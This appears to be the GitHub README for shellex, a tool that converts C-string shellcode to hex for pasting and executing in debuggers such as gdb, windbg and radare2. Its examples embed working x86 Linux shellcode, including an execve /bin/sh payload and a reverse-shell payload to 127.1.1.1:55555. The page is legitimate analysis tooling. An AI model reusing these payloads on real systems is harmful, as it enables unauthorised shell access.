C-shellcode to hex converter, handy tool for paste & execute shellcodes in gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor

Overview

shellex

WARNING: the ugliest code in the world

C-shellcode to hex converter.

Handy tool for paste & execute shellcodes in gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor.

Are you having problems converting C-shellcodes to HEX (maybe c-comments+ASCII mixed?)

Here is shellex. If the shellcode can be compiled in a C compiler shellex can convert it.

Just execute shellex, paste the shellcode c-string and press ENTER.

To end use Control+Z(Windows)/Control+D(Linux)

Converting c-shellcode-multi-line-hex+mixed_ascii (pay attention in the mixed part \x68//sh\x68/bin\x89):

"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

shellex output:

6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

Converting c-shellcode-multi-line-with-comments:

"\x68"
"\x7f\x01\x01\x01"  // <- IP:  127.1.1.1
"\x5e\x66\x68"
"\xd9\x03"          // <- Port: 55555
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce"

shellex output:

68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE

Do you need the shellex output as a new c-shellcode-string? just use -h parameter, example converting the shellex output:

./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80

Installation

git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git

For Windows:

binary:

shellex\bins\shellex.exe

For Linux

Deps:

sudo apt-get install tcc

binary:

shellex/linuxbins/shellex

Paste & Execute shellcode in ollydbg, x64dbg, immunity debugger

Just use my xshellex plugin:

https://github.com/David-Reguera-Garcia-Dreg/xshellex

Paste & Execute shellcode in gdb

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String to a file as raw binary data with "echo":
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc
  • gdb /bin/ls
  • starti

Write the binary file to the current instruction pointer:

for 32 bits:

restore /tmp/sc binary $eip
x/30b $eip
x/15i $eip

for 64 bits:

restore /tmp/sc binary $rip
x/30b $rip
x/15i $rip

x/30b is the size in bytes of the shellcode, you can get the size with:

wc -c /tmp/sc

x/15i is the number of instructions to display, you can get the correct number (maybe) with ndisasm:

sudo apt-get install nasm

For 32 bits:

ndisasm -b32 /tmp/sc
ndisasm -b32 /tmp/sc | wc -l

For 64 bits:

ndisasm -b64 /tmp/sc
ndisasm -b64 /tmp/sc | wc -l

Paste & Execute shellcode in gdb-gef

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert with: echo "SPACE shellex_output" | sed "s/ / 0x/g"
echo " 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80" | sed "s/ / 0x/g"

Use patch byte command:

For 32 bits:

patch byte $eip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

For 64 bits:

patch byte $rip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

Execute context command and check if the disasm is correct

Paste & Execute shellcode in gdb-peda

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 32 bits:

patch $eip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

For 64 bits:

patch $rip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

Execute context command and check if the disasm is correct

Paste & Execute shellcode in windbg

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D

via eb

For small shellcodes eb can be fine, just use shellex output with eb command (thx Axel Souchet @0vercl0k for the hint)

For 32 bits:

eb @eip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 64 bits:

eb @rip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

via file

  • convert the shellex output to raw binary data with certutil:
echo 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 > C:\Users\Dreg\sc.hex
certutil -f -decodeHex c:\Users\Dreg\sc.hex c:\Users\Dreg\sc
del C:\Users\Dreg\sc.hex

certutil output:

Input Length = 92
Output Length = 30
CertUtil: -decodehex command completed successfully.

The lenght of our shellcode is 30, then use L0n30 in windbg.

Write the binary file to the current instruction pointer:

for 32 bits:

.readmem C:\Users\Dreg\sc @eip L0n30

for 64 bits:

.readmem C:\Users\Dreg\sc @rip L0n30

Paste & Execute shellcode in radare2

  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String in radare2 using the "w" command:

For 32 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @eip

For 64 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @rip

Check if the shellcode is well-pasted:

Get the size of the shellcode in a terminal with:

echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" | wc -c

The output of last command is 30, Now use pD command in radare2:

pD 30

Non interactive mode

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Linux:

echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Windows:

echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe

Via multi-line-file in Windows:

C:\Users\Dreg\Desktop\shellex\bins>type sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe

Via multi-line-file in Linux:

[email protected]# cat sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
[email protected]# cat sc.txt | shellex

Compilation

For Windows just use Visual Studio 2013

For Linux just:

cd shellex/shellex
gcc -o shellex shellex.c
./shellex
You might also like...
Windows user-land hooks manipulation tool.
Windows user-land hooks manipulation tool.

MineSweeper Windows user-land hooks manipulation tool. Highlights Supports any x64/x86 Windows DLL (actually, any x64/x86 Windows PE for that matter)

Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux
Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux

Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux. Its main purpose is to help developers visualize the execution flow of a complex application.

WinMerge is an Open Source differencing and merging tool for Windows.
WinMerge is an Open Source differencing and merging tool for Windows.

WinMerge is an Open Source differencing and merging tool for Windows. WinMerge can compare both folders and files, presenting differences in a visual text format that is easy to understand and handle.

BlowBeef is a tool for analyzing WMI data.

Blowbeef BlowBeef is a tool for analyzing WMI data. Usage BlowBeef is a tool for analyzing WMI data.

Simple yet fancy CPU architecture fetching tool
Simple yet fancy CPU architecture fetching tool

Simple yet fancy CPU architecture fetching tool

VMPImportFixer is a tool aimed to resolve import calls in a VMProtect'd (3.x) binary.
VMPImportFixer is a tool aimed to resolve import calls in a VMProtect'd (3.x) binary.

VMPImportFixer VMPImportFixer is a tool aimed to resolve import calls in a VMProtect'd (3.x) binary. Information VMPImportFixer attempts to resolve al

Another system information tool written in C++
Another system information tool written in C++

Sysfex Another neofetch-like system information fetching tool for linux-based systems written in C++. This is a hobby project, so bugs are to be expec

A tool for Pikmin 1 model files

MODConv A Pikmin 1 model format converter Functionality NOTE: these are not command-line parameters, the program has a built-in input parser load (inp

KeyScan is a C++ open source explanation tool targeting windows operating system.
KeyScan is a C++ open source explanation tool targeting windows operating system.

KeyScan is a C++ open source explanation tool targeting windows operating system. it allows you to send keyboard events, mouse events and capture keystrokes (keylogger).!

Owner
David Reguera Garcia aka Dreg
Senior Malware Researcher, ASM, C, C++, x86_64, Research & Development.
David Reguera Garcia aka Dreg
Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

hasherezade 1.4k Sep 22, 2022
Remote Download and Memory Execute for shellcode framework

RmExecute Remote Download and Memory Execute for shellcode framework 远程下载并内存加载的ShellCode框架,暂不支持X64 参(抄)考(袭)项目 windows下shellcode提取模板的实现 主要抄袭来源,直接使用这位大佬

null 42 Aug 19, 2022
Hijack Printconfig.dll to execute shellcode

printjacker Printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The

Red Section 85 Sep 8, 2022
runsc loads 32/64 bit shellcode (depending on how runsc is compiled) in a way that makes it easy to load in a debugger. This code is based on the code from https://github.com/Kdr0x/Kd_Shellcode_Loader by Gary "kd" Contreras.

runsc This code is based on the code from https://github.com/Kdr0x/Kd_Shellcode_Loader by Gary "kd" Contreras and contains additional functionality. T

null 25 Sep 12, 2022
Compile and execute C "scripts" in one go!

c "There isn't much that's special about C. That's one of the reasons why it's fast." I love C for its raw speed (although it does have its drawbacks)

Ryan Jacobs 2k Sep 22, 2022
A docker image where you can run a judge program and a converter for multiple sequence alignment

genocon2021-docker 本リポジトリでは、ジャッジプログラム(eval.c)と Multiple Sequence Alignment (MSA) 変換プログラム(decode_cigar.py)を同梱した Docker イメージを提供しています。 また、サンプル解答プログラム(sam

Sakamoto, Kazunori 4 Sep 20, 2021
POCs for Shellcode Injection via Callbacks

Callback_Shellcode_Injection POCs for Shellcode Injection via Callbacks. Working APIs 1, EnumTimeFormatsA Works 2, EnumWindows Works 3, EnumD

Chaitanya Haritash 313 Sep 24, 2022
A tool for use with clang to analyze #includes in C and C++ source files

Include What You Use For more in-depth documentation, see docs. Instructions for Users "Include what you use" means this: for every symbol (type, func

null 3k Sep 17, 2022
A tool to edit Cyberpunk 2077 sav.dat files

This is a holidays project and will probably not reach the user-friendly GUI state that a save editor is expected to have.

null 263 Sep 19, 2022
GSmartControl - Hard disk drive and SSD health inspection tool

GSmartControl Hard disk drive and SSD health inspection tool GSmartControl is a graphical user interface for smartctl (from smartmontools package), wh

Alexander Shaduri 197 Sep 19, 2022